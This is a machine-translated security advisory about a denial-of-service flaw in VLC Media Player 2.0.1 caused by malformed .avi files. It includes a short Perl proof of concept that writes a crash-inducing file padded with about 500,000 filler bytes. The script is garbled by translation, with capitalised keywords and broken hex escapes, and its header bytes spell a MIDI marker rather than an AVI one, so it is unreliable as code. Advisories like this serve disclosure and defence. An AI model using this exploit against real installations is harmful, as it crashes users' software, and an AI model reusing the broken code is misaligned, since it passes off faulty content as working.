Release date:
Updated on:
Affected Systems:
VideoLAN VLC Media Player 2.0.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54208
VLC Media Player is a multimedia Player named VideoLAN client.
VideoLAN VLC Media Player 2.0.1 has a remote denial of service vulnerability when processing malformed. avi files, which can cause the affected applications to crash.
<* Source: Dark-Puzzle
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/perl
My $ h = "\ x4D \ x54 \ x68 \ x64 \ x00 \ x00 \ x00 \ x06 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 ";
My $ d = "\ x41" x 500429;
My $ file = "dark. avi ";
Open ($ File, "> $ file ");
Print $ File $ h, $ d;
Close ($ File );
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
VideoLAN
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.videolan.org/